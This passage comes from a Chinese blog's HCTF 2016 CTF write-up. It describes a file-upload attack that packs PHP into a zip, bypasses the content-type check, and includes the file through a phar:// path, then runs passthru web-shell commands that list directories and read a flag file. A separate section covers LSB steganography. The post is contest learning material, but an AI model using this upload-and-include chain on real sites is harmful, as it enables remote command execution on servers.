</code></pre><p>测试phar://可用，将php文件打包在zip文件中，再构造路径访问。<br>测试发现eval函数被禁用了，因此使用passthru函数执行系统命令。<br>写一个2.php文件，（这里我做题的时候似乎测试到有GET、POST、REQUEST等字段会被过滤，最后看官方wp是可以用GET的，可能是当时我测的出了点问题）打包在zip压缩包中上传，上传时使用burpsuite的截断功能修改content-type。<br>查看当前目录下文件：&lt;?php passthru(‘ls –alh’); ?&gt;<br>上传后访问文件名为24c38706822f22274de3d8faabb5b9601d922d85.png ，访问<br><a href="http://pics.hctf.io/home.php?fp=phar://uploads/24c38706822f22274de3d8faabb5b9601d922d85.png/2" target="_blank" rel="noopener">http://pics.hctf.io/home.php?fp=phar://uploads/24c38706822f22274de3d8faabb5b9601d922d85.png/2</a><br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-1.png" alt=""><br>没什么特别的<br>查看工作目录<br><code>&lt;?php passthru(‘pwd’); ?&gt;</code><br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-2.png" alt=""><br>查看上层目录<br><code>&lt;?php echo passthru(‘ls /var/www’);?&gt;</code><br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-3.png" alt=""><br>有个php文件，查看一下<br><code>&lt;?php echo passthru(‘cat /var/www/Th1s_1s_F1a9.php’);?&gt;</code><br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-4.png" alt=""><br>查看页面源代码<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-5.png" alt=""></p>
<h3 id="MISC-教练我想打CTF"><a href="#MISC-教练我想打CTF" class="headerlink" title="MISC 教练我想打CTF"></a>MISC 教练我想打CTF</h3><p>用神器Stegsolve打开，感觉在RGB0位有点问题，猜测是LSB隐写，分析一下<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/教练我想打CTF-2.png" alt=""><br>发现有pk文件头，猜测是个zip压缩包，保存出来，解压，发现提示文件损坏，用winrar自带的工具修复一下，成功了，打开看到一个叫1的文件，010editor打开，发现是个elf文件，继续往下看，成功发现flag<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/教练我想打CTF-3.png" alt=""></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>通过这次比赛，学到了很多新姿势，也让我认识到自己到底有多菜，dalao们有多强，再次膜拜各位dalao</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/03/05/ZCTF2017-web100-write-up/" rel="prev" title="ZCTF2017-web100 write up">
                ZCTF2017-web100 write up <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMjUzNy85MDk4"></div>
    </div>
  


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://avatars1.githubusercontent.com/u/15635180?s=460&v=4"
                alt="Headwind" />
            
              <p class="site-author-name" itemprop="name">Headwind</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/h34dw1nd" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://twitter.com/h3adw1nd" target="_blank" title="Twitter">
                    
                      <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-globe"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://thetachan.com/" title="Darwin" target="_blank">Darwin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://inj3ct0r.org/" title="Inj3ct0r大佬" target="_blank">Inj3ct0r大佬</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.jianshu.com/u/121bf0f6b3d2" title="阿烨师弟" target="_blank">阿烨师弟</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.jianshu.com/u/16d8909bf21f" title="喵夫" target="_blank">喵夫</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#写在开头的话"><span class="nav-number">1.</span> <span class="nav-text"><a href="#&#x5199;&#x5728;&#x5F00;&#x5934;&#x7684;&#x8BDD;" class="headerlink" title="&#x5199;&#x5728;&#x5F00;&#x5934;&#x7684;&#x8BDD;"></a>&#x5199;&#x5728;&#x5F00;&#x5934;&#x7684;&#x8BDD;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第一层"><span class="nav-number">2.</span> <span class="nav-text"><a href="#&#x7B2C;&#x4E00;&#x5C42;" class="headerlink" title="&#x7B2C;&#x4E00;&#x5C42;"></a>&#x7B2C;&#x4E00;&#x5C42;</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#MISC-杂项签到"><span class="nav-number">2.1.</span> <span class="nav-text"><a href="#MISC-&#x6742;&#x9879;&#x7B7E;&#x5230;" class="headerlink" title="MISC &#x6742;&#x9879;&#x7B7E;&#x5230;"></a>MISC &#x6742;&#x9879;&#x7B7E;&#x5230;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Web-2099年的flag"><span class="nav-number">2.2.</span> <span class="nav-text"><a href="#Web-2099&#x5E74;&#x7684;flag" class="headerlink" title="Web 2099&#x5E74;&#x7684;flag"></a>Web 2099&#x5E74;&#x7684;flag</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#第二层"><span class="nav-number">3.</span> <span class="nav-text"><a href="#&#x7B2C;&#x4E8C;&#x5C42;" class="headerlink" title="&#x7B2C;&#x4E8C;&#x5C42;"></a>&#x7B2C;&#x4E8C;&#x5C42;</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Web-RESTFUL"><span class="nav-number">3.1.</span> <span class="nav-text"><a href="#Web-RESTFUL" class="headerlink" title="Web RESTFUL"></a>Web RESTFUL</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MISC-gogogo"><span class="nav-number">3.2.</span> <span class="nav-text"><a href="#MISC-gogogo" class="headerlink" title="MISC gogogo"></a>MISC gogogo</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Web-兵者多诡"><span class="nav-number">3.3.</span> <span class="nav-text"><a href="#Web-&#x5175;&#x8005;&#x591A;&#x8BE1;" class="headerlink" title="Web &#x5175;&#x8005;&#x591A;&#x8BE1;"></a>Web &#x5175;&#x8005;&#x591A;&#x8BE1;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MISC-教练我想打CTF"><span class="nav-number">3.4.</span> <span class="nav-text"><a href="#MISC-&#x6559;&#x7EC3;&#x6211;&#x60F3;&#x6253;CTF" class="headerlink" title="MISC &#x6559;&#x7EC3;&#x6211;&#x60F3;&#x6253;CTF"></a>MISC &#x6559;&#x7EC3;&#x6211;&#x60F3;&#x6253;CTF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-number">3.5.</span> <span class="nav-text"><a href="#&#x603B;&#x7ED3;" class="headerlink" title="&#x603B;&#x7ED3;"></a>&#x603B;&#x7ED3;</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Headwind</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  








  




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=5.1.3"></script>



  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("okWkO6RWrbqjEGqKpoKSWfhn-gzGzoHsz", "L86DB3FDAclp8eQFlSOY5PzP");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

</body>
</html>
